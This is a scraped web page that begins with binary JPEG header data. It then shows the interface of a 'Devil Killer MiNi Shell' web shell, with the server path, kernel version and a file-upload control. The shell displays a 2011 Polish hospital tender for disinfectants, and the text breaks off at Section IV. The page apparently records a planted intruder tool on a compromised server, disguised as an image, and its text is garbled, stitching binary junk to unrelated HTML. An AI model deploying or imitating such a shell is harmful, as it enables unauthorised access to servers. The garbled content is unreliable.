JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110420/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110420/120321-N-2011.html

<p class="kh_header"><b>Toruń: Dostawa preparatów dezynfekcyjnych i antyseptycznych.</b><br>
<b>Numer ogłoszenia: 120321 - 2011; data zamieszczenia: 20.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Zespolony im. L. Rydygiera , ul. Św. Józefa 53/59, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 056 6101510, faks 056 6596128.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-bielany.torun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa preparatów dezynfekcyjnych i antyseptycznych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa preparatów dezynfekcyjnych i antyseptycznych z podziałem na 12 zadań: <br>
Zadanie Nr 1: Dezynfekcja i mycie narzędzi <br>
1.1 Środek dezynfekcyjny nie zawierający: aldehydów, pochodnych fenolowych, związków chloru, QAV i substancji nadtlenowych <br>
- spektrum działania - B, F, V, Tbc<br>
- max czas 1 h <br>(65.000 l)<br>
1.2: Środek do dezynfekcji narzędzi  i osprzętu endoskopowego na bazie aktywnego tlenu (z wykluczeniem nadboranu sodu)<br>
- spektrum działania - B, F, V (polio), Tbc - 10 min 
B, F (A. Niger), V (Polio, Adeno), Tbc (M.Tuberculosis),<br>
- max czas 15 min. <br>
- trwałość roztworu 24 godz. kontrolowana przy pomocy pasków<br>
- przygotowanie roztworu w wodzie o temp. pokojowej <br>(75.000 l)<br>
1.3. Środek do dezynfekcji narzędzi i osprzętu endoskopowego na bazie aktywnego tlenu (z wykluczeniem nadboranu sodu)<br>
- spektrum działania - B, F, V (polio), Tbc - 10min 
B, F (A. Niger), V (Polio, Adeno), Tbc (M.Tuberculosis),<br>
- max czas 15 min. <br>
- trwałość roztworu 24 godz. kontrolowana przy pomocy pasków<br>
- przygotowanie roztworu w wodzie o temp. pokojowej<br>
Opakowanie do 1,5 kg <br>(9.000 l)<br>

1.4.Enzymatyczny preparat do mycia wstępnego endoskopów, ph 5-6 - 10.800 l<br>

1.5. Aldehydowy, gotowy do użycia środek z aktywatorem do dezynfekcji endoskopów giętkich. Trwałość roztworu 14 dni, kontrolowana przy pomocy pasków. <br>
Spektrum: B, F, Tbc, V, S -10 godz.<br>
Opakowanie: 5l. <br>- 400 l<br>

Zadanie Nr 2:Preparaty do dezynfekcji maszynowej endoskopów: <br>
2.1 Detergentowy preparat myjący do myjni endoskopowej ETD PAA:<br>
- skład: niejonowe środki powierzchniowo-czynne, glikol<br>
- przeznaczenie: mycie maszynowe w myjniach OLYMPUS ETD<br>
- dozowanie - 5ml/l<br>
- opakowanie zawierające 4l koncentratu <br>(120 l)<br>
2.2 Preparat dezynfekcyjny do myjni endoskopowej ETD PAA:<br>
- skład: kwas octowy i nadoctowy, nadtlenek wodoru<br>
- spektrum działania: B, F, Tbc, V<br>
- przeznaczenie: dezynfekcja chemiczno-termiczna w myjniach OLYMPUS ETD<br>
- dozowanie: 10 ml/l<br>
- opakowanie zawierające 2,8 ml/l <br>(176,4 l)<br>
2.3 Aktywator do preparatu dezynfekcyjnego<br>
- dozowanie: 10 ml/l<br>
- opakowanie zawierające 4l koncentratu<br>
Pakiet jest nierozłączny. Preparaty muszą być kompatybilne ze sobą (pochodzić od jednego producenta)  <br>(180 l)<br>
2.4.Enzymatyczny preparat myjący do maszynowego mycia endoskopów w myjni ETD. Opakowanie zawierające 4 l preparatu. - 108 l<br>
2.5. Aldehydowy preparat dezynfekcyjny do myjni ETD. Opakowanie zawierające  4 litry preparatu.
Pakiet jest nierozłączny. Preparaty kompatybilne (od jednego producenta). - 168 l<br>
Zadanie Nr 3: Dezynfekcja dużych powierzchni zmywalnych: <br>
3.1 Preparat myjąco-dezynfekujący, bez aldehydów, pochodnych fenolowych, związków chloru, QAV i kwasu nadoctowego<br>
- spektrum działania - B, F, V(HIV, HBV, Vakcinia, Rota), Tbc<br>
- max czas 15 min. <br>(110.000 l)<br>
3.2 Preparat dezynfekcyjny do powierzchni  oraz basenów i kaczek.
(substancja aktywna - NaDCC <br>
- spektrum działania - B, V (Polio, Adeno), F (Aspergillus Niger), Tbc (M.Tuberculosis)<br>
- max czas 15 min<br>
- max stężenie aktywnego chloru - 2.000
  ppm w roztworze <br>
- pH roztworu 7<br>
- skuteczny wobec S (Cl. Dificille) w wyższych stężeniach <br>(150.000 l)<br>
3.3 Preparat na bazie nadtlenku wodoru, bez zawartości chloru, fenolu i aldehydów<br>
- spektrum działania: B (MRSA), F, V (HIV, HBV, Rota)<br>
- max czas działania - 15 min. Tbc do 30 min.  <br>(55.000 l)<br>
3.4 Preparat na bazie nadwęglanu sodu do mycia i dezynfekcji powierzchni zanieczyszczonych materiałem organicznym. Nie zawierający aldehydów, QAV, fenoli, chloru i barwników. Wymagany neutralny odczyn roztworu (pH=7,0-8,0). Produkt w postaci proszku<br>
- spektrum B, F, Tbc (m. tuberculosis), V(Polio), S<br>
- max czas działania 15 min <br>(160 l)<br>
Zadanie Nr 4: Dezynfekcja powierzchni trudnodostępnych (alkohole) bez aldehydów i chlorhexydyny <br>              
- spektrum działania - B, F, V (Vakcinia, Adeno), Tbc (M. Tuberculosis) - 5 min.<br>
- B, F, Rota - 1 min. <br>(1440 l)<br>
Zadanie Nr 5: Dezynfekcja inkubatorów<br>
- spektrum działania - B, F (A.Niger), V (Polio, Adeno), Tbc (M.Tuberculosis)<br>
- na bazie aktywnego tlenu<br>
- max czas 0,5 h  <br>(5000 l)<br>
Zadanie Nr 6: Dezynfekcja drobnego sprzętu medycznego i powierzchni za pomocą chusteczek <br>
6.1 Chusteczki z włókniny wiskozowej nasączonej alkoholem, do dezynfekcji drobnego sprzętu np. słuchawki lekarskie itp. <br>
- min. wymiary: 13x17 cm <br>
- spektrum działania: B, Tbc, F, V (HIV, HBV, HCV) <br>
- max. czas działania: 1 min. <br>
Opakowanie: sztywny pojemnik umożliwiający pobieranie pojedynczych chusteczek <br>(18.000 szt.)<br>
6.2. Bezalkoholowe chusteczki z włókniny wiskozowej nasączone płynem dezynfekcyjnym na bazie QAV do dezynfekcji głowic USG oraz małych powierzchni, skuteczne wobec wirusów polio, adeno i rota.<br>
- min. wymiary: 24 x 30 cm<br>
- spektrum działania: <br>
B, F, V (HIV, HBV, HCV) - 1 min.<br>
B, F(a. Niger), Tbc, V (noro) - 15 min.<br>
Opakowanie: sztywny pojemnik umożliwiający pobieranie pojedynczych chusteczek<br>(150.000 szt.)<br>
Zadanie nr 7: Preparat w postaci pianki do dezynfekcji sprzętu i aparatury medycznej wrażliwych na działanie alkoholi<br>
- preparat bez aldehydów, chloru i pochodnych fenolowych,<br>
- spektrum działania - B, F, V, Tbc - 5 min. <br>
Butelka ze spryskiwaczem do 750 ml. <br>(144 op.)<br>
Zadanie Nr 8: Mycie, dezynfekcja i pielęgnacja rąk:<br>
8.1 Dezynfekcja rąk
        Preparat na bazie co najmniej trzech substancji czynnych z różnych grup chemicznych, bez chlorheksydyny i pochodnych fenolowych.<br>
- spektrum działania - B, F, V(HIV, HBV, HSV, Rota), Tbc<br>
- pH 5-5,5 <br>
8.1.1 Preparat w pojemnikach do 0,5l - 1100 l <br>
8.1.2 Preparat w pojemnikach do 5l - 2200 l <br>
8.2 Płyn do mycia chirurgicznego
        i higienicznego rąk niezawierający mydła, <br>
        pH 5- 5,5  <br>
8.2.1 Preparat w pojemnikach do 0,5l - 1100 l <br>
8.2.2 Preparat w pojemnikach do 6l - 300 l <br>

8.3 Emulsja do pielęgnacji rąk<br>
Preparaty kompatybilne (od jednego producenta) - 220 l<br> 
Zadanie Nr 9: Dezynfekcja i mycie rąk<br>
9.1 Preparat do chirurgicznej i higienicznej dezynfekcji rąk
- opakowania dostosowane do systemu Sterisol - 1700 l <br>
9.2 Preparat do higienicznego i chirurgicznego mycia rąk oraz do mycia i pielęgnacji ciała pacjenta
-opakowania dostosowane do systemu Sterisol - 1550 l <br>
9.3. Krem nawilżający do systemu Sterisol
Preparaty od jednego producenta - 21 l <br>
Zadanie Nr 10: Dezynfekcja maszynowa narzędzi chirurgicznych<br>
10.1 Płynny, alkaliczny preparat do mycia i dezynfekcji chemicznej w myjniach-dezynfektorach narzędzi (również aluminiowych) i sprzętu anestezjologicznego, nie wymagający neutralizacji. Na bazie wodorotlenku potasu i tenzydów. Spektrum: B, F, Tbc, V - 500 l <br>
10.2 Płynny środek płuczący do myjni-dezynfektorów
Preparaty od jednego producenta. - 100 l <br>
Zadanie Nr 11: Dezynfekcja maszynowa basenów i kaczek<br>
11.1 Preparat do maszynowego mycia i płukania basenów szpitalnych i kaczek zawierający w składzie niejonowe zw. pow-czynne, inhibitory korozji i kwasy organiczne. O właściwościach odkamieniających (pH 1).
Dozowanie 0,5ml/l na każde 5 st. twardości wody. - 500 l <br>
11.2 Enzymatyczny preparat do mycia basenów i kaczek pH 5,5-7  - 50 l <br>
Zadanie Nr 12:  Środek myjąco-dezynfekujący w postaci żelu do czyszczenia odsysaczy i ślinociągów stomatologicznych, w opakowaniu 1000 ml  z dozownikiem. Środek na bazie glukoprotaminy. Czas działania min. 5 min. 
- spektrum działania B, F, V (HBV, HIV), Tbc - 90 l.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do przetargu Wykonawca obowiązany jest wnieść wadium w wysokości: 
Zadanie Nr 1 -   2.810,00 zł   <br>  
Zadanie Nr 2 -      490,00 zł      <br> 
Zadanie Nr 3 -   1.500,00 zł<br> 
Zadanie Nr 4 -      150,00 zł<br> 
Zadanie Nr 5 -       50,00 zł     <br> 
Zadanie Nr 6 -      380,00 zł      <br> 
Zadanie Nr 7 -        35,00 zł<br> 
Zadanie Nr 8 -      940,00 zł<br> 
Zadanie Nr 9 -     690,00 zł     <br> 
Zadanie Nr 10 -    110,00 zł      <br> 
Zadanie Nr 11 -    160,00 zł<br> 
Zadanie Nr 12 -      60,00 zł<br> 
RAZEM:           7.375,00  złotych<br> 
/słownie:  siedem tysięcy trzysta siedemdziesiąt pięć złotych  00/100/</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	koncesja hurtowni farmaceutycznej na obrót produktami leczniczymi - dotyczy  zadania Nr 8.1;9.1;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a/ wykaz wykonanych min. 3 dostaw środków dezynfekcyjnych o wartości minimalnej dla poszczególnych zadań:
- dla zadania Nr 1 - 56.200,00 zł<br> 
- dla zadania Nr 2 -   9.800,00 zł<br> 
- dla zadania Nr 3 - 30.000,00 zł<br> 
- dla zadania Nr 4 -   3.000,00 zł<br> 
- dla zadania Nr 5 -   1.000,00 zł<br> 
- dla zadania Nr 6 -   7.600,00 zł<br> 
- dla zadania Nr 7 -      700,00 zł<br> 
- dla zadania Nr 8 - 18.000,00 zł<br> 
- dla zadania Nr 9 - 13.800,00 zł<br> 
- dla zadania Nr 10 - 2.200,00 zł<br> 
- dla zadania Nr 11 - 3.200,00 zł<br> 
- dla zadania Nr 12 - 1.200,00 zł<br> 
      brutto każda dostawa w okresie ostatnich trzech lat przed upływem terminu składania ofert, 
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia min. 3 dokumentów potwierdzających, że te dostawy zostały wykonane należycie;

Wykonawca składający ofertę na kilka zadań musi wykazać się zrealizowanymi 
3 dostawami o wymaganej wartości łącznej równej sumie poszczególnych zadań, których dotyczy oferta.

Jeżeli Wykonawca wykazując spełnianie tego warunku polegać będzie na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2 b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda przedstawienia w ofercie w odniesieniu do tych podmiotów dokumentów stwierdzających, że do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 pkt 2 ustawy - Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a/	informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy do min. kwoty dla poszczególnych zadań:
     - dla zadania Nr 1 - 70.250,00 zł   <br> 
     - dla zadania Nr 2 - 12.250,00 zł    <br> 
     - dla zadania Nr 3 - 37.500,00 zł<br> 
	  - dla zadania Nr 4 -   3.750,00 zł  <br>  
	  - dla zadania Nr 5 -   1.250,00 zł <br> 
	  - dla zadania Nr 6 -    9.500,00 zł    <br> 
	  - dla zadania Nr 7 -       875,00 zł   <br> 
	  - dla zadania Nr 8 -  23.500,00 zł  <br> 
	  - dla zadania Nr 9 -  17.250,00 zł<br> 
	  - dla zadania Nr 10 -  2.750,00 zł<br> 
	  - dla zadania Nr 11 -  4.000,00 zł <br> 
	  - dla zadania Nr 12 - 1.500,00 zł   <br> 
        wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
 	/Informacja banku mówiąca tylko o obrotach na rachunku Wykonawcy nie spełni warunku udziału/.

Wykonawca składający ofertę na kilka zadań musi załączyć do oferty informację banku lub spółdzielczej kasy oszczędnościowo- kredytowej o wymaganej wartości łącznej równej sumie poszczególnych zadań, których dotyczy oferta.

         Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2 b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

2.1. Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a)	wpis do Rejestru Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych lub deklaracje zgodności CE.

b)	aktualnie obowiązujące karty charakterystyki preparatu niebezpiecznego dla oferowanego   preparatu, zgodne z Rozporządzeniem REACH 1907/2006/WE - nie dotyczy zadań Nr 8 i 9 

c) celem potwierdzenia skuteczności działania bójczego preparatów dezynfekcyjnych należy załączyć: dokumenty potwierdzające, iż przedmiot zamówienia został przebadany i odpowiada Normom Europejskim lub/i Normom Polskim (normy, co najmniej fazy II, dot. obszaru medycznego). W razie braku stosownych dokumentów potwierdzających, iż przedmiot zamówienia spełnia Normy Europejskie lub/i Normy Polskie, dopuszcza się alternatywnie badania zaakceptowane przez Prezesa URPLWMiPB np. badania Państwowego Zakładu Higieny lub wyniki badań wykonane przez akredytowane (notyfikacja, certyfikat jakości ISO) laboratoria z krajów UE - dotyczy zadań od Nr 1 do Nr 7 oraz zadania Nr 12 (preparaty do dezynfekcji narzędzi i powierzchni).

d) charakterystykę produktu leczniczego - dotyczy zadań Nr 8.1 i 9.1;

e)	aktualne pozwolenie na dopuszczenie do obrotu produktu leczniczego wydane przez Ministra Zdrowia - dotyczy zadania Nr 8.1 i 9.1;

f) próbki oferowanych preparatów - po 1 op. z każdego asortymentu
 Wykonawca zobowiązany jest do dostarczenia próbek oferowanego przedmiotu zamówienia najpóźniej w dniu i do godziny wyznaczonej na składanie ofert. Próbki muszą być 
w oryginalnych opakowaniach handlowych producenta.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) materiały prezentujące oferowane preparaty dezynfekcyjne (ulotki), zawierające między innymi obszar zastosowań i sposób użycia preparatu.

b) opis sposobu organizacji odbioru pustych opakowań po środkach dezynfekcyjnych bardzo  toksycznych, toksycznych, mutagennych, niebezpiecznych dla środowiska zgodnie z ustawą 
z dnia 11.05.2001 roku o odpadach i odpadach opakowaniowych Dz.U.2001 r. nr 6 poz.638.

c) oświadczenie o spełnianiu warunków udziału - załącznik Nr 6 do SIWZ

d) dowód wniesienia wadium

*Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie i według formuły: spełnia/nie spełnia. Zamawiający na podstawie złożonych wraz z ofertą dokumentów będzie badał czy dokumenty te potwierdzają wymóg spełnienia określonego przez Zamawiającego warunku.
*Wykonawca na żądanie Zamawiającego i w zakresie przez niego wskazanym jest zobowiązany wykazać odpowiednio, nie później niż na dzień składania ofert spełnianie warunków, o których mowa w art. 22 ust. 1, i brak podstaw do wykluczenia z powodu niespełniania warunków, o których mowa w art. 24 ust. 1.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
